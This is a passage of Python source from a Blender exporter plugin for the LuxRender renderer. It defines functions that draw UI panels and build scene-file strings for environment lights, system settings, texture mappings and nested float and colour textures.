	"""Build the environment "LightSource" section of the exported scene.

	Draws the environment-light UI (when gui is given).  For a non-"none"
	environment, exports optional X/Y/Z rotations followed by the
	LightSource declaration; for "infinite" also exports either an
	environment map or the Blender world horizon color, plus gain.

	scn: Blender scene the lux properties are attached to (may be None).
	gui: optional gui layout object; when None only the string is built.
	Returns the parameter string to append to the scene file.
	"""
	global icon_c_environment
	str = ""
	if scn:
		envtype = luxProp(scn, "env.type", "infinite")
		lsstr = luxIdentifier("LightSource", envtype, ["none", "infinite"], "ENVIRONMENT", "select environment light type", gui, icon_c_environment)
		if gui: gui.newline()
		str = ""
		if envtype.get() != "none":
			if envtype.get() in ["infinite", "sunsky"]:
#				env_lg = luxProp(scn, "env.lightgroup", "default")
#				luxString("env.lightgroup", env_lg, "lightgroup", "Environment light group", gui)
#				if luxProp(scn, "nolg", "false").get()!="true":
#					lsstr = '\nLightGroup "' + env_lg.get() + '"' + lsstr
				rotZ = luxProp(scn, "env.rotation", 0.0)
				rotY = luxProp(scn, "env.rotationY", 0.0)
				rotX = luxProp(scn, "env.rotationX", 0.0)
				if gui: gui.newline()
				luxFloat("rotation", rotX, 0.0, 360.0, "rot X", "environment rotation X", gui, 0.66)
				luxFloat("rotation", rotY, 0.0, 360.0, "rot Y", "environment rotation Y", gui, 0.66)
				luxFloat("rotation", rotZ, 0.0, 360.0, "rot Z", "environment rotation Z", gui, 0.66)
				if rotZ.get() != 0 or rotY.get() != 0 or rotX.get() != 0:
					# NOTE(review): "%d" truncates fractional degrees even
					# though the UI stores floats — confirm this is intended.
					str += "\tRotate %d 1 0 0\n"%(rotX.get())
					str += "\tRotate %d 0 1 0\n"%(rotY.get())
					str += "\tRotate %d 0 0 1\n"%(rotZ.get())
			str += "\t"+lsstr
			infinitehassun = 0
			if envtype.get() == "infinite":
				map = luxProp(scn, "env.infinite.mapname", "")
				mapstr = luxFile("mapname", map, "map-file", "filename of the environment map", gui, 1.5)
				mapstr += luxFloat("gamma", luxProp(scn, "env.infinite.gamma", 1.0), 0.0, 6.0, "gamma", "", gui, 1.0)
				if map.get() != "":
					str += mapstr
				else:
					# No map chosen: fall back to the Blender world horizon color.
					try:
						worldcolor = Blender.World.Get('World').getHor()
						str += "\n   \"color L\" [%g %g %g]" %(worldcolor[0], worldcolor[1], worldcolor[2])
					except: pass
				str += luxFloat("scale", luxProp(scn, "env.infinite.gain", 1.0), 0.0001, 100.0, "scale", "Infinite Env Gain", gui, 1.0)
			str += "\n"
		#if gui: gui.newline("GLOBAL:", 8, 0, None, [0.75,0.5,0.25])
		#luxFloat("scale", luxProp(scn, "global.scale", 1.0), 0.0, 10.0, "scale", "global world scale", gui)
	return str
def luxSystem(scn, gui=None):
	"""Draw the system/preferences panel (paths, priority, anim, preview...).

	Unlike the other lux* panel builders this returns nothing: it only
	draws widgets and updates scene-attached lux properties.

	scn: Blender scene the lux properties are attached to (may be None).
	gui: optional gui layout object.
	"""
	if scn:
		if gui: gui.newline("PATHS:", 10)
		lp = luxProp(scn, "pbrt", "")
		# NOTE(review): this rewrites the stored path to its dirname + os.sep
		# on every call (even without gui) — presumably to normalize a
		# file selection into a directory; confirm this is intended.
		lp.set(Blender.sys.dirname(lp.get())+os.sep)
		luxPath("PBRT dir", lp, "pbrt binary dir", "pbrt installation path", gui, 2.0)
#		luxFile("GUI filename", luxProp(scn, "lux", ""), "lux-file", "filename and path of the lux GUI executable", gui, 2.0)
#		luxFile("Console filename", luxProp(scn, "luxconsole", ""), "lux-file-console", "filename and path of the lux console executable", gui, 2.0)
		if gui: gui.newline()
		luxFile("datadir", luxProp(scn, "datadir", ""), "default out dir", "default.pbrt save path", gui, 2.0)
		if gui: gui.newline()
		pm = ["absolute","relative","flat"]
		luxOption("pathmode", luxProp(scn, "pathmode", "absolute"), pm, "path-mode", "select format for paths on export", gui, 2.0)
		if gui: gui.newline("PRIORITY:", 10)
		luxnice = luxProp(scn, "luxnice", 10)
		if osys.platform=="win32":
			# NOTE(review): gui is dereferenced unguarded here — on win32 this
			# branch would fail if luxSystem is ever called with gui=None.
			r = gui.getRect(2, 1)
			Draw.Menu("priority%t|abovenormal%x-10|normal%x0|belownormal%x10|low%x19", evtLuxGui, r[0], r[1], r[2], r[3], luxnice.get(), "", lambda e,v: luxnice.set(v))
		else: luxInt("nice", luxnice, -20, 19, "nice", "nice value. Range goes from -20 (highest priority) to 19 (lowest)", gui)
#		luxBool('export.threaded', luxProp(scn, 'export.threaded', 'true'), 'Pipe in background', 'When using pipe export, do not block Blender UI', gui, 1.0)
		if gui: gui.newline("ANIM:", 10)
		useparamkeys = luxProp(scn, "useparamkeys", "false")
		luxBool("useparamkeys", useparamkeys, "Enable Parameter IPO Keyframing", "Enables keyframing of luxblend parameters", gui, 2.0)
		if gui: gui.newline("PARAMS:", 10)
		parammodeadvanced = luxProp(scn, "parammodeadvanced", "false")
		luxBool("parammodeadvanced", parammodeadvanced, "Default Advanced Parameters", "Always use advanced parameters by default", gui, 2.0)
		if gui: gui.newline("PREVIEW:", 10)
		qs = ["low","medium","high","very high"]
		defprevmat = luxProp(scn, "defprevmat", "high")
		luxOption("defprevmat", defprevmat, qs, "Materials", "Select default preview quality in material editor for materials", gui, 1.0)
		if gui: gui.newline("GAMMA:", 10)
		luxBool("RGC", luxProp(scn, "RGC", "true"), "RGC", "use reverse gamma correction", gui)
#		luxBool("ColClamp", luxProp(scn, "colorclamp", "false"), "ColClamp", "clamp all colors to 0.0-0.9", gui)
#		if gui: gui.newline("MESH:", 10)
#		luxBool("mesh_optimizing", luxProp(scn, "mesh_optimizing", "true"), "optimize meshes", "Optimize meshes during export", gui, 2.0)
		#luxInt("trianglemesh thr", luxProp(scn, "trianglemesh_thr", 0), 0, 10000000, "trianglemesh threshold", "Vertex threshold for exporting (wald) trianglemesh object(s)", gui, 2.0)
		#if gui: gui.newline()
		#luxInt("barytrianglemesh thr", luxProp(scn, "barytrianglemesh_thr", 300000), 0, 100000000, "barytrianglemesh threshold", "Vertex threshold for exporting barytrianglemesh object(s) (slower but uses less memory)", gui, 2.0)
		if gui: gui.newline("INSTANCING:", 10)
		luxInt("instancing_threshold", luxProp(scn, "instancing_threshold", 2), 0, 1000000, "object instancing threshold", "Threshold to created instanced objects", gui, 2.0)
		# dougal2 packed images, enable this when implemented in Lux itself
		#if gui: gui.newline('TEXTURES:',10)
		#impack = luxProp(scn, 'packtextures', 'false')
		#luxBool('impack', impack, 'Pack All Images', '', gui, 2.0)
def scalelist(list, factor):
	"""Multiply every element of *list* by *factor* in place and return it."""
	for i, value in enumerate(list):
		list[i] = value * factor
	return list
def luxMapping(key, mat, gui, level=0):
	"""Draw the 2D texture-mapping controls and build their export string.

	key: property-key prefix of the texture being mapped.
	mat: material the lux properties are attached to.
	gui: optional gui layout object; when None only the string is built.
	level: UI indentation level.
	Returns the mapping parameter string.
	"""
	global icon_map2d, icon_map2dparam
	if gui: gui.newline("2Dmap:", -2, level, icon_map2d)
	mapping = luxProp(mat, key+".mapping", "uv")
	mappings = ["uv","spherical","cylindrical","planar"]
	str = luxOption("mapping", mapping, mappings, "mapping", "", gui, 0.5)
	if mapping.get() == "uv":
		if gui: gui.newline()
		str += luxFloat("uscale", luxProp(mat, key+".uscale", 1.0), -100.0, 100.0, "Us", "u-scale", gui, 0.5)
		# NOTE(review): vscale defaults to -1.0 — presumably to flip the
		# v axis between Blender and lux conventions; confirm.
		str += luxFloat("vscale", luxProp(mat, key+".vscale", -1.0), -100.0, 100.0, "Vs", "v-scale", gui, 0.5)
		str += luxFloat("udelta", luxProp(mat, key+".udelta", 0.0), -100.0, 100.0, "Ud", "u-delta", gui, 0.5)
		str += luxFloat("vdelta", luxProp(mat, key+".vdelta", 0.0), -100.0, 100.0, "Vd", "v-delta", gui, 0.5)
	if mapping.get() == "planar":
		str += luxFloat("udelta", luxProp(mat, key+".udelta", 0.0), -100.0, 100.0, "Ud", "u-delta", gui, 0.75)
		str += luxFloat("vdelta", luxProp(mat, key+".vdelta", 0.0), -100.0, 100.0, "Vd", "v-delta", gui, 0.75)
		if gui: gui.newline("v1:", -2, level+1, icon_map2dparam)
		str += luxVector("v1", luxProp(mat, key+".v1", "1 0 0"), -100.0, 100.0, "v1", "v1-vector", gui, 2.0)
		if gui: gui.newline("v2:", -2, level+1, icon_map2dparam)
		str += luxVector("v2", luxProp(mat, key+".v2", "0 1 0"), -100.0, 100.0, "v2", "v2-vector", gui, 2.0)
	return str
def lux3DMapping(key, mat, gui, level=0):
	"""Draw the 3D texture-mapping controls (scale/rotate/translate) and
	build their export string.

	key: property-key prefix of the texture being mapped.
	mat: material the lux properties are attached to.
	gui: optional gui layout object; when None only the string is built.
	level: UI indentation level.
	Returns the 3D-mapping parameter string.
	"""
	global icon_map3dparam
	out = ""
	if gui:
		gui.newline("scale:", -2, level, icon_map3dparam)
	out += luxVectorUniform("scale", luxProp(mat, key+".3dscale", 1.0), 0.001, 1000.0, "scale", "scale-vector", gui, 2.0)
	if gui:
		gui.newline("rot:", -2, level, icon_map3dparam)
	out += luxVector("rotate", luxProp(mat, key+".3drotate", "0 0 0"), -360.0, 360.0, "rotate", "rotate-vector", gui, 2.0)
	if gui:
		gui.newline("move:", -2, level, icon_map3dparam)
	out += luxVector("translate", luxProp(mat, key+".3dtranslate", "0 0 0"), -1000.0, 1000.0, "move", "translate-vector", gui, 2.0)
	return out
def getTreeNameById(tree, i):
	"""Return the name of the tree-menu entry whose id equals *i*.

	*tree* is a list of (name, value) tuples where value is either an
	integer menu id or a nested sub-tree (a list of the same shape).
	Entries that are not tuples (e.g. separators) are skipped.

	Returns the matching name, or None when no entry with id *i* exists.
	"""
	for entry in tree:
		# isinstance() instead of the Python-2-only type(...)==types.TupleType
		# comparison: idiomatic, and works on both Python 2 and 3.
		if isinstance(entry, tuple):
			if isinstance(entry[1], list):
				# recurse into the sub-tree
				found = getTreeNameById(entry[1], i)
				if found: return found
			elif entry[1] == i:
				return entry[0]
	return None
def luxTexture(name, parentkey, type, default, min, max, caption, hint, mat, gui, matlevel, texlevel=0, lightsource=0, overrideicon=""):
	"""Draw a (possibly nested) texture editor and build its export strings.

	name/parentkey: form the texture's property key and exported name.
	type: "float" or "color" — the texture's value type.
	default/min/max: default value and slider range.
	caption/hint: UI labels.
	mat: material (or material-like holder) the lux properties live on.
	gui: optional gui layout object; when None only strings are built.
	matlevel/texlevel: nesting levels (their sum is the UI indent level).
	lightsource: non-zero selects "blackbody" as the default texture type.
	overrideicon: optional icon overriding the automatic choice.

	Returns a (texture-declarations, parameter-link) string pair; nested
	textures (mix/scale/checkerboard/dots) recurse and concatenate both
	parts via the local helper c().
	"""
	global icon_tex, icon_texcol, icon_texmix, icon_texmixcol, icon_texparam, icon_spectex
	def c(t1, t2):
		# pairwise-concatenate two (declaration, link) string pairs
		return (t1[0]+t2[0], t1[1]+t2[1])
	def alternativedefault(type, default):
		# default for the second operand of two-texture combiners
		if type=="float": return 0.0
		else: return "0.0 0.0 0.0"
	level = matlevel + texlevel
	keyname = "%s:%s"%(parentkey, name)
	texname = "%s:%s"%(mat.getName(), keyname)
#	if gui: gui.newline(caption+":", 0, level)
	if(lightsource == 0):
		if texlevel == 0: texture = luxProp(mat, keyname+".texture", "imagemap")
		else: texture = luxProp(mat, keyname+".texture", "constant")
	else:
		texture = luxProp(mat, keyname+".texture", "blackbody")
	textures = ["constant","dots","fbm","imagemap","marble","mix","bilerp","checkerboard","scale","uv","windy","wrinkled"]
	if gui:
		# pick the icon matching the texture category (combiner / spectrum / plain)
		if(overrideicon != ""):
			icon = overrideicon
		else:
			icon = icon_tex
			if texture.get() in ["mix", "scale", "checkerboard", "dots"]:
				if type=="color": icon = icon_texmixcol
				else: icon = icon_texmix
			elif texture.get() in ["constant", "blackbody", "equalenergy", "frequency", "gaussian", "regulardata", "irregulardata"]:
				icon = icon_spectex
			else:
				if type=="color": icon = icon_texcol
				else: icon = icon_tex
		if (texlevel > 0): gui.newline(caption+":", -2, level, icon, scalelist([0.5,0.5,0.5],2.0/(level+2)))
		else: gui.newline("texture:", -2, level, icon, scalelist([0.5,0.5,0.5],2.0/(level+2)))
	luxOption("texture", texture, textures, "texture", "", gui, 2)
	str = "Texture \"%s\" \"%s\" \"%s\""%(texname, type, texture.get())
	if gui: Draw.PushButton(">", evtLuxGui, gui.xmax+gui.h, gui.y-gui.h, gui.h, gui.h, "Menu", lambda e,v: showMatTexMenu(mat,keyname,True))
	if gui: # Draw Texture level Material preview
		luxPreview(mat, parentkey, 1, False, False, name, gui, texlevel, [0.5, 0.5, 0.5])
		# Add an offset for next controls
		#r = gui.getRect(1.0, 1)
		#gui.x += 140
	if texture.get() == "constant":
		value = luxProp(mat, keyname+".value", default)
		if type == "float": luxFloat("value", value, min, max, "", "", gui, 1.1)
		elif type == "color": luxRGB("value", value, max, "", "", gui, 2)
		# direct version: a constant needs no Texture declaration, only a link
		if type == "color": return ("", " \"%s %s\" [%s]"%(type, name, value.getRGC()))
		return ("", " \"%s %s\" [%s]"%(type, name, value.get()))
		# indirect version
		# if type == "color": str += " \"%s value\" [%s]"%(type, value.getRGC())
		# else: str += " \"%s value\" [%s]"%(type, value.get())
	if texture.get() == "imagemap":
		if gui: gui.newline("IM-clip:", -2, level)
		str += luxOption("wrap", luxProp(mat, keyname+".wrap", "repeat"), ["repeat","black","clamp"], "repeat", "", gui, 1.0)
		if gui: gui.newline("IM-source:", -2, level)
		# ZANQDO
		texturefilename = luxProp(mat, keyname+".filename", "")
		extimage = luxProp(mat, keyname+'.externalimage', "true")
		luxBool("External Image", extimage, "External Image", "External Image", gui, 1.0)
		if gui: gui.newline("IM-path:", -2, level)
		if extimage.get() == "true":
			luxFile("filename", texturefilename, "file", "texture file path", gui, 2.0)
		else:
			# internal image: offer a menu of Blender images that have been saved
			bil = [i.filename for i in Image.Get() if '.' in i.filename]
			try:
				uti = [i.filename for i in Image.Get() if '.' not in i.filename]
				if len(uti) > 0:
					luxLabel("INFO: Images not listed here must be saved first", gui)
			except: pass
			if len(bil) > 0:
				luxOption("Image", texturefilename, bil, "Blender Images", "Blender Image", gui, 2.0)
			else:
				luxLabel("No Blender Images - Load Image in the Image Editor", gui)
		# dougal2 image file packing
		# impack = luxProp(Scene.GetCurrent(), 'packtextures', 'false')
		if True: # impack.get() == 'false':
			str += luxFile("filename", texturefilename, "file", "texture file path", None, 2.0)
		# else:
		#	import zlib, base64
		#	def get_image_data(filename):
		#		try:
		#			f=open(filename,'rb')
		#			d=f.read()
		#			f.close()
		#		except:
		#			print('Error reading image data from %s' % filename)
		#			d = ''
		#		return base64.b64encode(zlib.compress(d))
		#	imdata = get_image_data(texturefilename.get())
		#	str += '\r\n   "string imagedata" ["%s"]' % imdata
		useseq = luxProp(mat, keyname+".useseq", "false")
		luxCollapse("usesew", useseq, "Sequence", "", gui, 2.0)
		if useseq.get() == "true":
			# image-sequence support: rewrite the filename for the current frame
			seqframes = luxProp(mat, keyname+".seqframes", 100)
			luxInt("frames", seqframes, 1, 100000, "Frames", "", gui, 0.5)
			seqoffset = luxProp(mat, keyname+".seqoffset", 0)
			luxInt("offset", seqoffset, 0, 100000, "Offset", "", gui, 0.5)
			seqstartframe = luxProp(mat, keyname+".seqsframe", 1)
			luxInt("startframe", seqstartframe, 1, 100000, "StartFr", "", gui, 0.5)
			seqcyclic = luxProp(mat, keyname+".seqcycl", "false")
			luxBool("cyclic", seqcyclic, "Cyclic", "", gui, 0.5)
			totalframes = seqframes.get()
			currentframe = Blender.Get('curframe')
			if(currentframe < seqstartframe.get()):
				fnumber = 1 + seqoffset.get()
			else:
				fnumber = (currentframe - (seqstartframe.get()-1)) + seqoffset.get()
			if(fnumber > seqframes.get()):
				if(seqcyclic.get() == "false"):
					fnumber = seqframes.get()
				else:
					fnumber = currentframe % seqframes.get()
			import re
			def get_seq_filename(number, filename):
				# replace the rightmost digit-run in the filename with the
				# zero-padded frame number
				m = re.findall(r'(\d+)', filename)
				if len(m) == 0:
					return "ERR: Can't find pattern"
				rightmost_number = m[len(m)-1]
				seq_length = len(rightmost_number)
				nstr = "%i" %number
				new_seq_number = nstr.zfill(seq_length)
				return filename.replace(rightmost_number, new_seq_number)
			texturefilename.set(get_seq_filename(fnumber, texturefilename.get()))
		if gui: gui.newline()
		str += luxFloat("gamma", luxProp(mat, keyname+".gamma", texturegamma()), 0.0, 6.0, "gamma", "", gui, 0.75)
		str += luxFloat("scale", luxProp(mat, keyname+".scale", 1.0), 0.0, 10.0, "scale", "", gui, 0.5)
		# filttype = luxProp(mat, keyname+".filtertype", "bilinear")
		# filttypes = ["mipmap_ewa","mipmap_trilinear","bilinear","nearest"]
		# str += luxOption("filtertype", filttype, filttypes, "filtertype", "Choose the filtering method to use for the image texture", gui, 0.75)
		# if filttype.get() == "mipmap_ewa" or filttype.get() == "mipmap_trilinear":
		#	str += luxFloat("maxanisotropy", luxProp(mat, keyname+".maxanisotropy", 8.0), 1.0, 512.0, "maxaniso", "", gui, 1.0)
		#	str += luxInt("discardmipmaps", luxProp(mat, keyname+".discardmipmaps", 0), 0, 1, "discardmips", "", gui, 1.0)
		str += luxMapping(keyname, mat, gui, level+1)
	if texture.get() == "mix":
		(s, l) = c(("", ""), luxTexture("amount", keyname, "float", 0.5, 0.0, 1.0, "amount", "The degree of mix between the two textures", mat, gui, matlevel, texlevel+1, lightsource))
		(s, l) = c((s, l), luxTexture("tex1", keyname, type, default, min, max, "tex1", "", mat, gui, matlevel, texlevel+1, lightsource))
		(s, l) = c((s, l), luxTexture("tex2", keyname, type, alternativedefault(type, default), min, max, "tex2", "", mat, gui, matlevel, texlevel+1, lightsource))
		str = s + str + l
	if texture.get() == "scale":
		(s, l) = c(("", ""), luxTexture("tex1", keyname, type, default, min, max, "tex1", "", mat, gui, matlevel, texlevel+1, lightsource))
		(s, l) = c((s, l), luxTexture("tex2", keyname, type, alternativedefault(type, default), min, max, "tex2", "", mat, gui, matlevel, texlevel+1, lightsource))
		str = s + str + l
	if texture.get() == "bilerp":
		if type == "float":
			str += luxFloat("v00", luxProp(mat, keyname+".v00", 0.0), min, max, "v00", "", gui, 1.0)
			str += luxFloat("v01", luxProp(mat, keyname+".v01", 1.0), min, max, "v01", "", gui, 1.0)
			if gui: gui.newline("", -2)
			str += luxFloat("v10", luxProp(mat, keyname+".v10", 0.0), min, max, "v10", "", gui, 1.0)
			str += luxFloat("v11", luxProp(mat, keyname+".v11", 1.0), min, max, "v11", "", gui, 1.0)
		elif type == "color":
			if gui: gui.newline("          v00:", -2)
			str += luxRGB("v00", luxProp(mat, keyname+".v00", "0.0 0.0 0.0"), max, "v00", "", gui, 2.0)
			if gui: gui.newline("          v01:", -2)
			str += luxRGB("v01", luxProp(mat, keyname+".v01", "1.0 1.0 1.0"), max, "v01", "", gui, 2.0)
			if gui: gui.newline("          v10:", -2)
			str += luxRGB("v10", luxProp(mat, keyname+".v10", "0.0 0.0 0.0"), max, "v10", "", gui, 2.0)
			if gui: gui.newline("          v11:", -2)
			str += luxRGB("v11", luxProp(mat, keyname+".v11", "1.0 1.0 1.0"), max, "v11", "", gui, 2.0)
		str += luxMapping(keyname, mat, gui, level+1)
	if texture.get() == "windy":
		str += lux3DMapping(keyname, mat, gui, level+1)
		# this texture has no options
	if texture.get() == "checkerboard":
		dim = luxProp(mat, keyname+".dim", 2)
		str += luxInt("dimension", dim, 2, 3, "dim", "", gui, 1)
		if dim.get() == 2: str += luxOption("aamode", luxProp(mat, keyname+".aamode", "closedform"), ["closedform","supersample","none"], "aamode", "antialiasing mode", gui, 0.6)
		if gui: gui.newline("", -2)
		(s, l) = c(("", ""), luxTexture("tex1", keyname, type, default, min, max, "tex1", "", mat, gui, matlevel, texlevel+1, lightsource))
		(s, l) = c((s, l), luxTexture("tex2", keyname, type, alternativedefault(type, default), min, max, "tex2", "", mat, gui, matlevel, texlevel+1, lightsource))
		str = s + str + l
		if dim.get() == 2: str += luxMapping(keyname, mat, gui, level+1)
		if dim.get() == 3: str += lux3DMapping(keyname, mat, gui, level+1)
	if texture.get() == "dots":
		(s, l) = c(("", ""), luxTexture("inside", keyname, type, default, min, max, "inside", "", mat, gui, matlevel, texlevel+1, lightsource))
		(s, l) = c((s, l), luxTexture("outside", keyname, type, alternativedefault(type, default), min, max, "outside", "", mat, gui, matlevel, texlevel+1, lightsource))
		str = s + str + l
		str += luxMapping(keyname, mat, gui, level+1)
	if texture.get() == "fbm":
		str += luxInt("octaves", luxProp(mat, keyname+".octaves", 8), 1, 100, "octaves", "", gui, 1)
		# if gui: gui.newline("", -2)
		str += luxFloat("roughness", luxProp(mat, keyname+".roughness", 0.5), 0.0, 1.0, "roughness", "", gui, 1, 1)
		if gui: gui.newline("", -2)
		str += lux3DMapping(keyname, mat, gui, level+1)
	if texture.get() == "marble":
		str += luxInt("octaves", luxProp(mat, keyname+".octaves", 8), 1, 100, "octaves", "", gui, 1)
		# if gui: gui.newline("", -2)
		str += luxFloat("roughness", luxProp(mat, keyname+".roughness", 0.5), 0.0, 1.0, "roughness", "", gui, 1, 1)
		if gui: gui.newline("", -2)
		str += luxFloat("nscale", luxProp(mat, keyname+".nscale", 1.0), 0.0, 100.0, "nscale", "Scaling factor for the noise input", gui, 1.0)
		str += luxFloat("variation", luxProp(mat, keyname+".variation", 0.2), 0.0, 100.0, "variation", "A scaling factor for the noise input function", gui, 1.0)
		if gui: gui.newline("", -2)
		str += lux3DMapping(keyname, mat, gui, level+1)
	if texture.get() == "wrinkled":
		str += luxInt("octaves", luxProp(mat, keyname+".octaves", 8), 1, 100, "octaves", "", gui, 1)
		# if gui: gui.newline("", -2)
		str += luxFloat("roughness", luxProp(mat, keyname+".roughness", 0.5), 0.0, 1.0, "roughness", "", gui, 1, 1)
		if gui: gui.newline("", -2)
		str += lux3DMapping(keyname, mat, gui, level+1)
	return (str+"\n", " \"texture %s\" [\"%s\"]"%(name, texname))
def luxSpectrumTexture(name, key, default, max, caption, hint, mat, gui, level=0):
	"""Draw a color parameter with an optional texture toggle.

	Shows an RGB control; when the "T" toggle is enabled a full texture
	editor is drawn instead, and a non-white RGB value is applied on top
	via an auto-generated "scale" texture.

	Returns a (texture-declarations, parameter-link) string pair.
	"""
	global icon_col
	if gui: gui.newline(caption, 4, level, icon_col, scalelist([0.5,0.6,0.5],2.0/(level+2)))
	str = ""
	keyname = "%s:%s"%(key, name)
	texname = "%s:%s"%(mat.getName(), keyname)
	value = luxProp(mat, keyname, default)
	link = luxRGB(name, value, max, "", hint, gui, 2.0)
	tex = luxProp(mat, keyname+".textured", False)
	if gui: Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, tex.get()=="true", "use texture", lambda e,v:tex.set(["false","true"][bool(v)]))
	if tex.get()=="true":
		if gui: gui.newline("", -2)
		(str, link) = luxTexture(name, key, "color", default, 0, max, caption, hint, mat, gui, level+1)
		# multiply the texture by the RGB value unless the value is pure white
		if value.getRGB() != (1.0, 1.0, 1.0):
			if str == "": # handle special case if texture is a just a constant
				str += "Texture \"%s\" \"color\" \"scale\" \"color tex1\" [%s] \"color tex2\" [%s]\n"%(texname+".scale", (link.rpartition("[")[2])[0:-1], value.get())
			else: str += "Texture \"%s\" \"color\" \"scale\" \"texture tex1\" [\"%s\"] \"color tex2\" [%s]\n"%(texname+".scale", texname, value.get())
			link = " \"texture %s\" [\"%s\"]"%(name, texname+".scale")
	return (str, link)
def luxLightSpectrumTexture(name, key, default, max, caption, hint, mat, gui, level=0):
	"""Draw a light-emission color texture selector.

	Unlike luxSpectrumTexture() this always delegates to luxTexture() (no
	plain-RGB shortcut) and never wraps the result in a scale texture.
	Returns (texture-declaration string, parameter-link string).
	"""
	# Fix: the previous revision built unused keyname/texname locals and
	# shadowed the builtin "str"; both removed.
	(tex_str, link) = luxTexture(name, key, "color", default, 0, max, caption, hint, mat, gui, level+1, 0, 1)
	return (tex_str, link)
def luxFloatTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
	"""Draw a float property with an optional texture override.

	Returns (texture-declaration string, parameter-link string); the
	declaration is empty when the plain numeric value is used.
	"""
	global icon_float
	if gui:
		gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6], 2.0/(level+2)))
	prop_key = "%s:%s" % (key, name)
	tex_id = "%s:%s" % (mat.getName(), prop_key)
	value = luxProp(mat, prop_key, default)
	link = luxFloat(name, value, min, max, "", hint, gui, 2.0)
	use_tex = luxProp(mat, prop_key+".textured", False)
	if gui:
		Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, use_tex.get()=="true", "use texture", lambda e,v: use_tex.set(["false","true"][bool(v)]))
	out = ""
	if use_tex.get() == "true":
		if gui:
			gui.newline("", -2)
		(out, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
		# Multiply the texture by the value unless that would be a no-op.
		if value.get() != 1.0:
			scale_name = tex_id+".scale"
			if out == "":
				# Texture reduced to a plain constant; extract it from the link.
				const = (link.rpartition("[")[2])[0:-1]
				out += "Texture \"%s\" \"float\" \"scale\" \"float tex1\" [%s] \"float tex2\" [%s]\n" % (scale_name, const, value.get())
			else:
				out += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n" % (scale_name, tex_id, value.get())
			link = " \"texture %s\" [\"%s\"]" % (name, scale_name)
	return (out, link)
def luxFloatSliderTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
	"""Draw a float property as a captioned slider with an optional texture
	override.

	Identical to luxFloatTexture() except the numeric widget is rendered as
	a slider. Returns (texture-declaration string, parameter-link string).
	"""
	global icon_float
	if gui:
		gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6], 2.0/(level+2)))
	prop_key = "%s:%s" % (key, name)
	tex_id = "%s:%s" % (mat.getName(), prop_key)
	value = luxProp(mat, prop_key, default)
	link = luxFloat(name, value, min, max, caption, hint, gui, 2.0, 1)
	use_tex = luxProp(mat, prop_key+".textured", False)
	if gui:
		Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, use_tex.get()=="true", "use texture", lambda e,v: use_tex.set(["false","true"][bool(v)]))
	out = ""
	if use_tex.get() == "true":
		if gui:
			gui.newline("", -2)
		(out, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
		# Multiply the texture by the value unless that would be a no-op.
		if value.get() != 1.0:
			scale_name = tex_id+".scale"
			if out == "":
				# Texture reduced to a plain constant; extract it from the link.
				const = (link.rpartition("[")[2])[0:-1]
				out += "Texture \"%s\" \"float\" \"scale\" \"float tex1\" [%s] \"float tex2\" [%s]\n" % (scale_name, const, value.get())
			else:
				out += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n" % (scale_name, tex_id, value.get())
			link = " \"texture %s\" [\"%s\"]" % (name, scale_name)
	return (out, link)
def luxExponentTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
	"""Draw a float property edited as its reciprocal ("exponent" style).

	The GUI widget shows 1/value (range 1..1000000) and stores 1/input
	back, so tiny roughness-like values can be edited on a convenient
	scale. Returns (texture-declaration string, parameter-link string);
	the first element is non-empty only when a texture override is active.
	"""
	global icon_float
	if gui: gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6],2.0/(level+2)))
	str = ""
	keyname = "%s:%s"%(key, name)
	texname = "%s:%s"%(mat.getName(), keyname)
	value = luxProp(mat, keyname, default)
	# guard against an unset property; 0.002 is the fallback exponent used here
	if(value.get() == None): value.set(0.002)
#	link = luxFloat(name, value, min, max, "", hint, gui, 2.0)
	if gui:
		r = gui.getRect(2.0, 1)
		# the widget edits the reciprocal: it displays 1/value and stores 1/input
		Draw.Number("", evtLuxGui, r[0], r[1], r[2], r[3], float(1.0/value.getFloat()), 1.0, 1000000.0, hint, lambda e,v: value.set(1.0/v))
	link = " \"float %s\" [%f]"%(name, value.getFloat())
	tex = luxProp(mat, keyname+".textured", False)
	if gui: Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, tex.get()=="true", "use texture", lambda e,v:tex.set(["false","true"][bool(v)]))
	if tex.get()=="true":
		if gui: gui.newline("", -2)
		(str, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
		# wrap the texture in a scale texture unless the multiplier is exactly 1.0
		if value.get() != 1.0:
			if str == "": # texture reduced to a plain constant: fold it into the scale texture
				str += "Texture \"%s\" \"float\" \"scale\" \"float tex1\" [%s] \"float tex2\" [%s]\n"%(texname+".scale", (link.rpartition("[")[2])[0:-1], value.get())
			else: str += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n"%(texname+".scale", texname, value.get())
			link = " \"texture %s\" [\"%s\"]"%(name, texname+".scale")
	return (str, link)
def luxDispFloatTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
	"""Draw a displacement float property with an optional texture override.

	When a texture is active it is always wrapped in a scale texture (even
	for a 1.0 multiplier, unlike luxFloatTexture). Returns
	(texture-declaration string, parameter-link string).
	"""
	global icon_float
	if gui:
		gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6], 2.0/(level+2)))
	prop_key = "%s:%s" % (key, name)
	tex_id = "%s:%s" % (mat.getName(), prop_key)
	value = luxProp(mat, prop_key, default)
	link = luxFloat(name, value, min, max, "", hint, gui, 2.0)
	use_tex = luxProp(mat, prop_key+".textured", False)
	if gui:
		Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, use_tex.get()=="true", "use texture", lambda e,v: use_tex.set(["false","true"][bool(v)]))
	out = ""
